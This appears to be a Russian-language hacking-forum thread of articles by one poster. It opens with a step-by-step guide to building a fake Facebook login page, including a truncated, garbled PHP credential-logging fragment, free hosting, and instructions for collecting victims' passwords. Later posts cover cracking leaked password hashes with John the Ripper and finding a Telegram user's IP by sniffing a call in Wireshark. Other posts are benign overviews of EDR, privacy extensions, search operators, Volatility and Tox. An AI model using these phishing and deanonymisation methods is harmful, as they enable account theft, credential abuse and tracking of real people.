https://i.gyazo.com/6e31ac1387dcd546fa732d14607f09dd.jpg
Готово, вы успешно научились взламывать аккаунт Facebook с помощью фишинга.
А теперь покажем продвинутый метод для тех, кто хочет изучить все технические детали взлома Facebook вручную.
Продвинутый способ взлома
Сейчас вы узнаете, как создавать собственную фишинговую страницу Facebook вручную.
Шаг 1. Откройте facebook.com. Чтобы создать фишинговую страницу, перейдите на официальный сайт Facebook и щелкните правой кнопкой мыши пустую область. Вы увидите множество опций, вам нужно нажать на опцию просмотра исходной страницы.
Шаг 2. Создание копии страницы Facebook. Когда вы нажмете на просмотр исходного кода страницы, откроется новая вкладка, показывающая весь код. Это исходный код страницы Facebook.
https://i.gyazo.com/82f54dc68f9de75832fa9566a54c87e4.jpg
Сейчас мы будем его редактировать для создания фишинговой страницы Facebook. Для этого: выделите весь код, скопируйте и вставьте его в блокнот и сохраните файл как index.htm. Расширение файла — .htm, а не .html. Не допускайте этой ошибки.
Шаг 3. Отредактируйте исходный код. Теперь откройте блокнот, в который вы вставили этот код, нажмите CTRL+F и введите ACTION в строке поиска. Далее найдите следующую строку в коде:
action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Когда вы найдете код, указанный выше, удалите всё после слова action и замените словом post.php, как показано ниже:
action="post.php"
Шаг 4. Сохраните код в новую папку с именем index.htm. Итак, вы завершили первую часть фишинговой страницы.
Шаг 5. Создание файла PHP. Чтобы создать вторую часть фишинговой страницы Facebook, вам необходимо создать файл PHP. В качестве примера мы будем использовать наш файл под названием post.php. Если вы планируете использовать другое имя, обязательно измените его и в index.htm. Откройте новый файл блокнота, скопируйте приведенный ниже код и сохраните его под именем post.php.
$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Шаг 6. Сохраните фишинговые файлы Facebook вместе.Теперь вы успешно создали два файла, которые следует сохранить в одной папке.
index.htm
post.php
Шаг 7. Создайте учетную запись на бесплатном хостинге. Перейдите на сайт 000webhost и нажмите кнопку «Зарегистрироваться», используя любой адрес электронной почты. Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.
Шаг 8. Откройте файловый менеджер и загрузите файлы. После откройте Cpanel на панели управления вашего хостинга. Выберите файловый менеджер и нажмите «Диспетчер файлов», чтобы перейти в папку public_html.
Шаг 9. Загрузите index.htm и post.php. Нажмите кнопку «Загрузить файлы» и загрузите оба файла, которые вы ранее сохранили.
Шаг 10. Убедитесь, что все фишинговые файлы загружены, а затем откройте свой сайт. Перед вами будет обычная, на первый взгляд, страница Facebook, но когда вы увидите URL-адрес, вы поймете, что это фишинговая страница.
Шаг 11. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали.
Шаг 12. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере файл с именем username.txt. Откройте его, чтобы узнать логин и пароль.
Поздравляем, вы научились взламывать аккаунт Facebook с помощью собственной фишинговой страницы.
ЗаключениеСегодня вы узнали не только, как хакеры взламывают Facebook и другие учетные записи социальных сетей с помощью фишинговых URL-адресов, но и посмотрели на этот процесс с изнанки. Надеемся, что статья оказалась полезной для вас. Обязательно проверяйте URL-адреса, прежде чем переходить по каким-либо ссылкам. На этом все. Удачи!
BlackMAST
23.11.2023, 12:36
Извлекаем хэши паролей с помощью John The Ripper
https://i.gyazo.com/ffd1756ab575a7be5e43e02700813c75.jpg
Вступить в наш чатБольшинство начинающих пентестеров не понимают, как извлекать хэши паролей. И поэтому сегодня мы расскажем, как это сделать с помощью инструмента John The Ripper.
https://i.gyazo.com/56c68f5e9d3cd8cbf1c496e719063e8e.jpg
В прошлой статье мы говорили о том, что такое хэширование. Если вы еще не читали её, то советуем начать именно с неё. А теперь давайте коротко вспомним, что означает этот термин.
Хэширование – это процесс преобразования данных (в нашем случае паролей) в зашифрованную строку для обеспечения безопасности. Хэш - это набор случайных символов, который генерируется на основе текстового пароля с помощью специального алгоритма хэширования, что позволяет защитить пароль от взлома и улучшить его безопасность. Даже если злоумышленник получит доступ к базе данных паролей, он не сможет прочитать их в открытом виде и использовать для входа в систему. Так как же все-таки расшифровать полученные хэши? Что ж, у Джонни есть ответ, который вам нужен.
Установка
Представляем Johnny — кроссплатформенный графический интерфейс с открытым исходным кодом для популярного взломщика паролей John the Ripper, который доступен в Kali Linux. Но вы также можете установить его и в Windows, для этого просто скачайте программу установки с официального сайта.
Цель Джонни — автоматизировать и упростить взлом паролей с помощью универсального инструмента John the Ripper, а также добавить к нему дополнительные функции, в том числе и удобный графический интерфейс, а еще множество атак и улучшенный рабочий процесс хэширования.
Далее вам понадобится установочный файл John the Ripper, который вы можете скачать здесь. Теперь откройте и установите Джонни, как и любое другое приложение. Как только вы закончите с этим, вам нужно настроить инструмент. Для этого распакуйте John the Ripper в папку.
Используйте настройки, чтобы соединить Джона Потрошителя и Джонни вместе.
https://i.gyazo.com/56a244d4620f3c4b4fa25842be089df1.jpg
Теперь, когда оба инструмента подключены друг к другу, мы можем приступить к взлому хэшей паролей.
В этом демонстрационном руководстве мы будем использовать список DEFCON, содержащий хэшированные пароли, которые нам нужно взломать. Он имеет более 50 000 паролей учетных записей, которые мы взломаем менее чем за 2 часа.
Итак, поехали!
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1. Импортируем хэши
Запустите Johnny и импортируйте хэши с помощью опции для открытия файла паролей.
Шаг 2. Ищем список слов
Загрузите хороший словарь из Интернета. Мы будем использовать список слов из двух миллиардов возможных паролей, который вы можете скачать отсюда.
Шаг 3. Выбираем список слов
Перейдите в раздел «Wordlist» и выберите загруженный список слов.
Шаг 4. Выбираем типа хэша
Теперь по умолчанию для взлома будет автоматически выбран наиболее часто используемый тип хэша - sha1, но вы также можете настроить тип вручную. После нажмите «Начать атаку», и должен начаться взлом пароля.
https://i.gyazo.com/d89e223d2c152c4a7f53a67a2bb5bbe2.jpg
Шаг 5. Меняем тип хэша
После того, как вы взломали все возможные хэши одного типа, нужно ввести другой тип хеша и снова продолжить взлом.
Наберитесь терпения. В нашем случае на взлом 50.000 паролей ушло 2 часа. Но если у вас более мощный компьютер, то получится и быстрее.
Так как же все это работает?
Что ж, происходит следующее: Джонни автоматизировал процесс взлома паролей и, используя наш список слов, начал сравнивать хэши паролей с хэшами, присутствующими в списке задач. Стоит отметить, что пароли были далеко не из простых, но тем не менее, мы их смогли легко взломать. Иначе говоря, если у вас есть надежный список слов, то вы можете взломать практически любой пароль.
Как защитить свой пароль от взлома
Остерегайтесь фишинговых атак;
Используйте двухфакторную аутентификацию для всего, чем вы только пользуетесь;
Создайте пароль длиной не менее 12 символов. Чем больше пароль, тем сложнее его взломать;
Проверьте, не была ли когда-либо скомпрометирована ваша электронная почта. Для этого зайдите на этот сайт.
Будьте бдительны и совершенствуйте свои знания, читая наши статьи.
BlackMAST
11.12.2023, 18:12
EDR — обнаружение и реагирование на угрозы конечных точек
https://i.gyazo.com/827c5f585bdc249ac297453aa5a08d4e.jpg
Вступить в наш чатКаждый день пользователи сталкиваются с различными киберугрозами, поскольку злоумышленники находят новые способы атак. Это требует надежных мер безопасности, и одним из главных решений является обнаружение и реагирование на угрозы конечных точек (EDR). EDR служит важнейшим щитом против угроз, отслеживая и быстро реагируя на потенциальные опасности, скрывающиеся в конечных точках.
https://i.gyazo.com/a84e58177dbe7ca194797766d22d0aac.jpg
Что такое конечные точки
Конечные точки — это физическое оборудование, которое подключается к сетевой системе. Это могут быть мобильные устройства, настольные компьютеры, виртуальные машины, встроенная аппаратура или серверы. Средства обеспечения безопасности конечных точек помогают защитить их от злоумышленников и уязвимостей.
Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к личным данным. Они находятся за пределами сетевого периметра безопасности, и за их защиту отвечают пользователи, которые часто допускают ошибки. Защита конечных точек от атак имеет первостепенное значение, и за нее отвечает EDR.
Что такое EDR
EDR или Endpoint Detection and Response (в переводе с англ. обнаружение и реагирование на угрозы конечных точек) — важнейшее решение в области кибербезопасности, предлагает непрерывный мониторинг и защиту от различных угроз, нацеленных на конечные точки. Эти угрозы охватывают широкий спектр: от вредоносного программного обеспечения и программ-вымогателей до фишинга и сложных эксплойтов нулевого дня.
EDR анализирует данные, собранные с различных устройств, таких как компьютеры, ноутбуки, серверы и мобильные устройства, быстро выявляя любые подозрительные действия и реагируя на них.
Основные функции EDR
По своей сути EDR выполняет три важные функции:
Сбор данных: EDR постоянно собирает данные с конечных точек, анализируя информацию об активности файлов, сетевых подключениях и т.д.. Эти данные составляют основу возможностей EDR по обнаружению и реагированию.
Обнаружение угроз: EDR использует передовые методы, включая машинное обучение, поведенческий анализ и анализ угроз для выявления закономерностей, указывающих на потенциальные угрозы. Сюда входит обнаружение известных вредоносных программ, программ-вымогателей, фишинга и эксплойтов нулевого дня.
Автоматизированный ответ: при обнаружении угрозы EDR может предпринять автоматические действия для устранения угрозы. Эти действия могут включать изоляцию зараженной конечной точки, помещение вредоносных файлов в карантин или даже полное удаление угрозы.
Механизмы обнаружения EDR
EDR использует различные механизмы для выявления и классификации потенциальных угроз:
Обнаружение на основе подписей. Этот традиционный метод сравнивает подписи файлов с базой данных известных вредоносных программ. Если файл соответствует известной подписи, он помечается как вредоносный.
Эвристический анализ. Этот метод проверяет поведение и характеристики файла для выявления подозрительных закономерностей, которые могут указывать на вредоносное ПО, даже если сам файл неизвестен.
Поведенческий анализ. Благодаря поведенческому анализу EDR активно отслеживает запущенные процессы и приложения, быстро обнаруживая аномалии, которые могут сигнализировать о вредоносных действиях. Этот метод способствует превентивному выявлению потенциальных угроз.
Машинное обучение. Используя алгоритмы машинного обучения, EDR эффективно анализирует обширные наборы данных, быстро выявляя сложные закономерности, указывающие на потенциальные угрозы. Такой подход значительно расширяет возможности обнаружения угроз.
Анализ угроз. Благодаря интеграции с потоками данных об угрозах EDR всегда находится в курсе новейших ландшафтов угроз, уязвимостей и развивающихся методов атак. Эта интеграция позволяет системе активно предвидеть и противодействовать возникающим угрозам.
Лучшие инструменты EDR
Вот некоторые из передовых инструментов EDR на рынке:
Palo Alto Networks Cortex R
Palo Alto Networks Cortex R предлагает комплексное решение EDR, обеспечивающее не только видимость конечных точек, но и надежное обнаружение угроз и возможности быстрого реагирования на атаки. Cortex R, известный своими расширенными функциями машинного обучения, легко интегрируется с различными устройствами, повышая их общую безопасность.
SentinelOne Singularity
Singularity — это облачное решение EDR, известное своей простотой использования и способностью масштабироваться до крупных предприятий. Он предлагает множество функций, включая обнаружение конечных точек, поиск угроз и автоматическое ликвидирование.
CrowdStrike Falcon Insight R
Falcon Insight R — еще одно облачное решение EDR, известное своими мощными возможностями обнаружения и использованием машинного обучения для выявления угроз. Falcon R решает самые серьезные проблемы обнаружения и реагирования на инциденты, обеспечивая: видимость, поиск и реагирование с неслыханной скоростью и масштабом.
Cynet 360 AutoR
Cynet 360 AutoR - это усовершенствованная платформа для обнаружения и реагирования на угрозы, которая точно обнаруживает сложные кибератаки, такие как Advanced Persistent Threats (APT), продвинутые вредоносные программы, трояны, вымогатели и атаки "нулевого дня".
Trend Micro R
R — это облачное решение EDR, которое собирает и коррелирует данные, охватывая несколько уровней безопасности — электронную почту, конечные устройства, серверы, сети и облачные нагрузки. Такой анализ данных позволяет быстрее обнаруживать угрозы и сокращать время расследования и реагирования.
Выбор лучшего инструмента для вас будет зависеть от ваших конкретных потребностей и требований.
Заключение
Перед лицом быстро меняющихся угроз EDR выступает в качестве важного инструмента для пользователей и организаций, стремящихся защитить свои данные и системы. Использование EDR имеет решающее преимущество в борьбе с киберугрозами.
BlackMAST
10.08.2024, 14:02
Топ 7 хакерских расширений для вашего браузера
https://i.gyazo.com/8100cb69d9504c37be15c1efe872dd96.jpg
Вступить в наш чат
В интернете, где на каждом шагу скрываются угрозы, важно уметь защищать свое личное киберпространство. Расширения браузера предлагают уникальный уровень защиты как для хакеров, так и для обычных пользователей, которые беспокоятся о безопасности своих данных. Эти расширения имеют множество функций: от выявления уязвимостей до защиты паролей. И сегодня мы поделимся с вами 7 лучшими расширениями браузера, о которых должен знать каждый.
https://i.gyazo.com/ea3d5cb1993e7102cf0081b52a665ce8.jpg
1. Foxyproxy Standard
https://i.gyazo.com/dbacdd1357e336196eb6fb9a64598fe3.png
Представьте себе сёрфинг в Интернете без ограничений, легкий обход геоблокировок и доступ к контенту со всего мира. С Foxyproxy Standard это становится реальностью. Расширение позволяет легко переключать IP-адреса, а обширная сеть прокси-серверов гарантирует, что у вас всегда будет надежное соединение под рукой с повышенной безопасностью во время просмотра.
2. Multi-Account Containers
https://i.gyazo.com/2abc489ec37b9b036b929df23cc7ada3.jpg
Multi-Account Containers - это расширение, разрабатанное Mozilla и позволяющее разделить просмотр между различными помеченными цветом вкладками для защиты вашей конфиденциальности. Используя эти контейнеры, вы можете категоризировать просмотр на основе целей и создавать вкладки для Работы, Банкинга, Покупок и Личного. Контейнер с несколькими учетными записями выступает в роли вашего личного органайзера, изолируя каждую учетную запись в отдельные категории, чтобы файлы cookie и учетные данные для входа не мешали друг другу. Это расширение не только упрощает управление учетной записью, но и защищает вашу конфиденциальность, предотвращая межсайтовое отслеживание и несанкционированный доступ.
3. Pwnfox
https://i.gyazo.com/a9556025725e568c8bf1f0cb4b867b09.jpg
Для тех, кто хочет попробовать себя в роли хакера или эксперта по безопасности, выявляя уязвимости, Pwnfox станет бесценным помощником. Это расширение легко интегрируется с веб-браузерами, сканируя сайты на наличие пробелов в безопасности, а затем предоставляет подробную инструкцию о том, как их можно использовать.
4. HackBar V2 (Firefox) and HackBar (Chrome)
https://i.gyazo.com/bbc2ed88b4f80f463f9c0ac24c5df9ed.jpg
Представьте себе, что у вас под рукой есть набор команд, инструментов и фрагментов кода, готовых упростить ваши задачи по взлому. С HackBar это становится возможным. Он автоматизирует повторяющиеся задачи, упрощает сложные операции и повышает общую производительность.
5. Hack-Tools
https://i.gyazo.com/dfd4c2d551b129602afb8de81c8b7e7d.jpg
Hack-Tools — это сокровищница для хакеров и специалистов по кибербезопасности, предлагающая полный набор инструментов, адаптированных к различным аспектам хакинга. От полезных нагрузок XSS до инструментов кодирования данных и генератора хэшей. Hack-Tools имеет универсальный магазин для широкого спектра потребностей в области кибербезопасности, который станет незаменимым помощником в вашем наборе инструментов.
6. Shodan
https://i.gyazo.com/e7da2cf151c5ebbab91350cf568b5486.jpg
Раскрыть тайный мир интернет устройств теперь стало возможным благодаря Shodan, известной поисковой системе, специально разработанной для этой цели. Это расширение легко интегрирует возможности Shodan в ваш веб-браузер, позволяя вам искать и анализировать устройства на основе их IР адресов, портов и другой соответствующей информации. Shodan — бесценный инструмент для исследователей безопасности и хакеров.
7. uBlock Origin
https://i.gyazo.com/f76a1e7ad3146de0bd8f057744d9bf0e.jpg
В интернете на сегодняшний день навязчивая реклама, всплывающие окна и вредоносные скрипты стали нежелательной нормой. Они тормозят вашу работу и ставят под угрозу вашу конфиденциальность. uBlock Origin поможет вам в этом деле, заблокируя все возможные помехи на ваших веб-страницах благодаря обширным фильтрам и настройкам.
Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Сегодня мы рассказали вам о 7 расширениях браузера, тщательно отобрав самые лучшие с учетом их функциональности и значимости. Но на этом наша подборка не заканчивается, в следующей части мы поговорим о других расширениях для улучшения ваших навыков, оптимизации рабочего процесса и повышения общей эффективности в цифровом мире. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство.
BlackMAST
10.08.2024, 14:04
Анонимность браузера с помощью Privacy Possum
https://i.gyazo.com/8bc4295f9dc967609171c88f520303b2.jpg
Вступить в наш чат
Отслеживание пользователей в Интернете уже давно в порядке вещей. И прямо сейчас за вашими действиями могут наблюдать. Однако, не все так плачевно, если знать, как «уйти в тень». Сегодня мы вам расскажем, как защититься от слежки с помощью расширения Privacy Possum.
https://i.gyazo.com/4ce3c21156cd4e67118488d21e50a89d.jpg
Конечно, ничто не мешает вам загрузить Tor Browser, который, к слову, и сам основан на Firefox. Но если вы уже привыкли к Firefox, то на помощь придет созданное независимыми разработчиками расширение. С его помощью можно блокировать трекинг со стороны интернет-ресурсов, менять данные геолокации, модифицировать «отпечаток» браузера, а также делать множество других крутых и полезных вещей.
Читать по теме: Расширения для анонимности Firefox
Защита от отслеживания с Privacy Possum
Privacy Possum — расширение с открытым исходным кодом для браузеров Chrome и Firefox. Privacy Possum предотвращает прием файлов cookies, блокирует HTTP-заголовки set-cookie и referrer, а также искажает «отпечаток» браузера, что затрудняет фингерпринтинг.
https://i.gyazo.com/228b4c08a9a1bb5cf85e8dfabf76e5a9.png
BlackMAST написал(а):
https://i.gyazo.com/021312149bedc11c8715988f0d90dff1.jpg
Как быстро найти данные в бесконечном потоке информации
Вступить в наш чат
Как работают поисковики?
Выделяют три основных этапа работы поисковых систем:
Сканирование. За первый этап отвечает поисковой робот или паук. Он собирает и отбирает информацию с сайтов, анализирует изменения в контенте, URL-адреса, а также код и карты сайтов. Все это делается для того, чтобы определить тип отображаемой информации.
Индексация. Как только сканирование завершается, индексатор организовывает и совершает быстрый поиск по собранной информации, т.е. анализирует данные сайта.
Поисковик. На последнем этапе происходит сортировка сайтов в зависимости от предпочтений запроса, качества и степени соответствия. Таким образом, перед нами предстает контент на странице результатов поиска.
Поисковые операторы
Что такое операторы информации и зачем они нужны?
Поисковые операторы - это специальные слова, символы, фразы, включенные в поисковой запрос, помогают конкретизировать запрашиваемую информацию для выдачи максимально точного результата. Главная их задача - это отфильтровывать запросы с определенным содержимым, сузить данные, исключая ненужную информацию. Вы можете комбинировать операторы друг с другом, чтобы поиск был еще продуктивнее.
Google
Простые поисковые операторы:
+ запрос по нужным словам в одном предложении. Оператор "плюс" помогает в конкретизации поиска. Например, возьмем слово "ключ", которое имеет несколько значений, поэтому чтобы получить тот результат, которые нам нужен, мы уточним запрос: ключ +скрипичный, ключ +родник, ключ +гаечный. В итоге вы получаете те сайты, в которых есть полный набор слов из запроса.
https://i.gyazo.com/99409c2f3e884ed9a0c3a66437d7bf79.jpg
- оператор "минус" наоборот исключает слово из запроса. Делая запрос "Ключ -скрипичный", вы получите любую информацию кроме скрипичного ключа.
https://i.gyazo.com/3e1e74fafb2a3ff4d4d93d65dcc37f7a.jpg
"" показывают только те страницы, где фраза идет в точно написанной последовательности.
https://i.gyazo.com/3b18688f5372e372ba108af9c5a165f1.jpg
| (OR) оператор «или», вы можете использовать любой из двух вариантов, чтобы получить запрос по нескольким словам одновременно или по одному из предложенных
https://i.gyazo.com/66a0fd16d31c23701e55e9a1cc6f3e3f.jpg
.. две точки отображают результаты поиска, имеющие конкретных цифровой диапазон. Также обратите внимание, что мы комбинировали 2 поисковых оператора.
https://i.gyazo.com/d41af21896e57a136f83cf5f171f8d73.jpg
@и# – операторы для поиска информации в соц. сетях по тегам и хештегам.
https://i.gyazo.com/0e116e8cd2d00a3cb4d7886817a52e06.jpg
Сложные поисковые операторы:
site:оператор, который ищет информацию на определенном сайте.
https://i.gyazo.com/b93ce863d2779f3cde3ab0ae85bb2a77.jpg
related: оператор для поиска сайтов с похожим контентом.
https://i.gyazo.com/bd07ad6a2b1447af5f1f0e37303e5b1a.jpg
intitle: поиск страниц по заголовку.
https://i.gyazo.com/8da966093282f7471794af5dc005a645.jpg
allinurl: оператор, с помощью которого легко найти сайты, содержащие в адресе страницы указанные слова. Для большего отображения страниц лучше всего использовать транслитерацию, либо латиницу.
https://i.gyazo.com/e2da4ed447bd7b85ea0540cf49ff325e.jpg
allintext: поиск по содержимому страницы. Хороший способ найти сайт, если его адрес вы забыли.
https://i.gyazo.com/f7866f8031d837f1264d0b6084590b9f.jpg
intext: поиск как и с предыдущем оператором, только выборка страниц производится по текстовому описанию для одного слова.
info: служит для показа всей информации об адресе.
allinanchor: отбирает страницы с ключевыми словами.
inanchor: похожий оператор, который ищет только по одному заданному слову.
Яндекс
Поисковые операторы:
+ оператор "плюс" работает так же как и у Google.
! используется перед нужным словом для его точного отображения в поиске без изменений.
"" показывают только те страницы, где фраза идет в точно написанной последовательности, как и в Google.
* используется для замещения слов в фразах, песнях, цитатах. Помогает в случае, если вы забыли нужное слово.
( ) оператор "скобки" служит для группировки слов в сложных запросах.
& ставится между двумя словами, а поисковик ищет страницы, где эти слова находятся в одном предложении.
title: оператор, который ищет по заголовкам сайтов.
mime: помогает найти документы нужного формата, к примеру mime
https://darkmoney.one/images/smilies/tongue.gif
df.
site: выборка по всем страницам сайта.
inurl: находит страницы только с ключевыми словами данного домена.
Как составлять запрос:
Искать в разных поисковых системах;
Искать одну и ту же информацию на разных языках (английский);
Менять порядок слов;
Использовать синонимы;
Ну и, конечно же, использовать поисковые операторы.
https://telegra.ph/Kak-bystro-najti-...formacii-03-30
Как и большинство расширений для конфиденциальности, он добавляет значок на главную панель инструментов, которая действует как индикатор активности блокировки. Продвинутых настроек у плагина нет: его можно включить или выключить, а на страничке конфигурации — запретить автоматическое обновление и разрешить ему запускаться в приватном окне.
https://i.gyazo.com/e8a82760de7c8f0c727eaa06d8821a1b.png
Текущая версия расширения блокирует четыре разных способа слежки:
Блокировка заголовков референта, которые могут отображать местоположение просмотра;
Блокировка заголовков etag для отслеживания кеширования браузера. Privacy Possum strip и хранит данные заголовка etag и сравнивает его с сторонними запросами к URL-адресу, чтобы определить, используется ли заголовок для отслеживания или нет;
Блокировка всех сторонних файлов cookie, которые используются для отслеживания пользователей;
Блокировка некоторых браузеров. Если сайт смешивает код фингерпринтинга первой стороны с кодом, необходимым для запуска сайта, Privacy Possum не будет блокировать, а будет разбавлять данные, введя случайные данные, чтобы изменить фингерпринт.
Privacy Possum запускается автоматически. Расширение указывает на активность блокировки, добавляя номер к его значку. Появится щелчок по значку.
Интерфейс имеет переключатель включения-выключения, который можно использовать для деактивации расширения. Privacy Possum поддерживает функцию белого списка. В нем перечислены заблокированные элементы, например, заголовки отслеживания или файлы JavaScript, которые загружаются в интерфейс; просто нажмите на флажок перед заблокированным элементом, чтобы отключить блокировку для этого конкретного сайта.
Скачать Privacy Possum
Скачать расширение можно с маркетов Firefox, Google и с официальной страницы на Гитхаб.
Заключение
Privacy Possum — многообещающее расширение браузера для Chrome и Firefox, которое улучшает вашу конфиденциальность в Интернете. Оно предлагает много защитных функций, и, безусловно, поможет сохранить вашу анонимность.
BlackMAST
10.08.2024, 14:14
Volatility. Анализ вредоносного ПО
https://i.gyazo.com/dec7efbb256222b57d17d1f2efe04e09.jpg
Вступить в наш чат
В этой статье мы поговорим об инструменте Volatility и о том, как проводить анализ вредоносного ПО, используя этот инструмент. Мы обсудим различные возможности инструмента и его команды.
https://i.gyazo.com/a2d8e066ed4b0b8115d2f69ec63043a6.png
Что такое анализ вредоносных программ?
Анализ вредоносных программ — это процесс, который исследует функционирование, цели и потенциальное воздействие вредоносного программного обеспечения (вредоносных программ). Этот тип анализа имеет первостепенное значение в мире кибербезопасности, поскольку вредоносное ПО становится все более сложным и всепроникающим.
Анализ файлов можно разделить на два вида:
Статический, при котором файл исследуется без его исполнения;
Динамический, когда инициируется запуск файла в безопасной среде (тестовая железка или виртуальная машина).
Стоит отметить, что соблюдения перечисленных правил полностью не обезопасят вас от заражения компьютера или потери данных, связанных с неосторожной работой с вредоносными файлами. Но значительно повысят надёжность вашего рабочего окружения.
Итак, что нас подстерегает при анализе вредоносного ПО:
Случайный запуск исполняемого файла.
Эксплуатация уязвимости в анализируемом ПО.
Блокировка антивирусом работы утилиты или удаление самого анализируемого файла.
Что такое Volatility
Volatility — инструмент криминалистической экспертизы памяти с открытым исходным кодом для анализа оперативной памяти, который часто используется при анализе вредоносного ПО для извлечения информации из дампов памяти. Инструмент позволяет изучать память работающей или спящей системы и выполнять различные методики анализа для выявления и понимания вредоносной активности.
Однако, если вы используете Kali Linux, он устанавливается по умолчанию.
В системах на основе Debian просто установите его с помощью следующей команды:
sudo apt-get install volatility
Преимущества Volatility:
Написан на Python: многим аналитикам памяти удобно работать со скриптами Python.
Кроссплатформенный: Volatility может работать на любой платформе, поддерживающей Python, что означает, что вам не нужно тратить время на загрузку или установку.
Имеет открытый исходный код.
Бесплатный.
Позволяет создавать скрипты: вы можете автоматизировать задачи с помощью Volatility, так как он легко позволяет использовать скрипты.
Команды в Volatility
Вот основные команды в Volatility, которые часто используются при анализе вредоносного ПО:
imageinfo — отображает основную информацию о дампе памяти, такую как профиль, версию операционной системы и уровень обновления.
volatility -f imageinfo
pslist — команда выводит список всех запущенных процессов в дампе памяти.
volatility -f --profile= pslist
psscan — сканирует процессы в памяти и может быть полезной для обнаружения скрытых или завершенных процессов.
volatility -f --profile= psscan
pstree — команда отображает дерево процессов, показывая связи между родительскими и дочерними процессами.
volatility -f --profile= pstree
dlllist — выводит список всех загруженных DLL-библиотек для каждого процесса.
volatility -f --profile= dlllist -p
handles — отображает все открытые дескрипторы (handles) в дампе памяти.
volatility -f --profile= handles
cmdscan — сканирует историю командной строки в дампе памяти.
volatility -f --profile= cmdscan
getsids — выводит список всех идентификаторов безопасности (SIDs) в дампе памяти.
volatility -f --profile= getsids
apihooks — идентифицирует процессы, в которых установлены зацепления API.
volatility -f --profile= apihooks
malfind — сканирует внедренный код или потенциально вредоносный код в работающих процессах.
volatility -f --profile= malfind
malsysproc — идентифицирует потенциально вредоносные процессы на основе эвристик.
volatility -f --profile= malsysproc
malfind, malprocfind и malfind2 — эти команды можно использовать вместе для сканирования внедренного кода или вредоносных процессов.
volatility -f --profile= malfind
volatility -f --profile= malprocfind
volatility -f --profile= malfind2
Не забудьте заменить путем к вашему файлу дампа памяти и на соответствующий профиль для операционной системы и архитектуры дампа памяти.
Это только базовый набор команд; Volatility предоставляет множество дополнительных плагинов и функций для расширенного анализа памяти.
Заключение
Анализ вредоносных программ помогает улучшить свою защиту от киберугроз. Процесс анализа позволяет понять методы распространения, цели и векторы атак вредоносных программ. Volatility является важным набором инструментов для анализа вредоносного ПО, так как информация, полученная с помощью этого инструмента, может быть использована для оптимизации мер безопасности.
BlackMAST
27.08.2024, 16:02
Как определить IP-адрес пользователя Telegram
https://i.gyazo.com/0aed949c065502d8846258d1e0e10763.jpg
Вступить в наш чат
Сегодня мы расскажем вам про простой способ деанона, а именно как узнать IP-адрес пользователя Telegram.
Как определить IP-адрес в Telegram
Чтобы определить IP-адрес в Telegram, выполните следующие шаги:
Скачивание и установка сниффера Wireshark.
Выбор соответствующего интерфейса.
Звонок целевому пользователю.
Настройка параметров поиска Wireshark.
Поиск протокола TCP и определение IP-адреса.
А теперь рассмотрим каждый этап подробнее.
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1: Скачивание Wireshark
Прежде всего, необходимо скачать и установить Wireshark, мощный инструмент для перехвата и анализа сетевых протоколов. Загрузить его можно с официального сайта Wireshark.
https://i.gyazo.com/e5b2b72f6be6abc2d954c1ae45707f75.png
Скачивание Wireshark для пробива IP адреса Телеграм
После установки откройте Wireshark, и можно приступать к работе.
https://i.gyazo.com/75f1e96bf680521284a9a1eb23e0a3fa.png
Скачивание Wireshark для пробива IP адреса Телеграм
Шаг 2: Выбор соответствующего интерфейса
Запустите Wireshark и выберите сетевой интерфейс, который вы хотите мониторить. Это соединение будет использоваться для совершения звонка.
https://i.gyazo.com/cb07120cb3541cfd410fde01df0e07af.png
Выбор интерфейса для определения IP адресШаг 3: Звонок к пользователю
Используя учетную запись, инициируйте звонок целевому пользователю через Telegram.
Шаг 4: Настройка параметров поиска Wireshark
В Wireshark настройте фильтр для перехвата нужных данных. В частности, необходимо выполнить поиск по строке R-MAPPED-ADDRESS.
https://i.gyazo.com/3c9e24beb812980d72b15d5f90c26f0e.png
Настройка параметров поиска Wireshark
https://i.gyazo.com/f5e90b4c48e67b26416179b729f752b0.png
Настройка параметров поиска WiresharkШаг 5: Поиск протокола TCP
Найдите пакеты данных с протоколом TCP, в которых IP-адрес назначения является публичным IP-адресом. Это и есть искомый IP-адрес.
https://i.gyazo.com/82289218eb4a7e7476d65f112ba18616.png
Узнать IP адрес Telegram пользователя
Когда вы обнаружите в перехваченных данных публичный IP-адрес, вы успешно определите IP-адрес целевого пользователя.
https://i.gyazo.com/c09662d5148de46e74257729eaf35d73.png
Узнать IP адрес Телеграм пользователяКак избежать определения IP-адреса в Telegram
Чтобы избежать утечки своего IP-адреса, необходимо зайти в Настройки Telegram —> Конфиденциальность и безопасность —> Звонки, а затем выбрать Не использовать в меню Peer-to-Peer, как показано ниже.
https://i.gyazo.com/491c0b8ecf9f49b66e67b4976055ac04.png
BlackMAST
27.08.2024, 16:35
Tox - анонимный мессенджер
https://i.gyazo.com/cde579181b68e0d32659d126d804c50b.jpg
Вступить в наш чат
Нужна безопасная и анонимная замена Skype? Тогда вы попали в нужное место. В извечном стремлении хранить тайну переписки нам поможет мессенджер Tox. Сегодня мы расскажем, как установить и пользоваться этим мессенджером.
https://i.gyazo.com/e13a433039d38f83d130b8a19df00486.png
Как работает Tox?
Tox — это новый вид мгновенных сообщений, созданный в ответ на широкое распространение цифрового слежения со стороны корпораций и правительств. Он может похвастаться двумя технологиями: шифрованием и P2P. Это простое в использовании программное обеспечение, которое позволяет вам общаться без посторонних ушей. В отличие от других известных сервисов, которые требуют оплату за дополнительные функции, Tox абсолютно бесплатен и не содержит рекламы.
Основные функции Tox включают:
Мгновенные сообщения. Безопасное общение по всему миру;
Голосовые вызовы. Зашифрованные голосовые вызовы без каких-либо затрат;
Видеозвонки. Возможность видеть собеседника в режиме реального времени;
Поделиться экраном. Демонстрация экрана вашего компьютера;
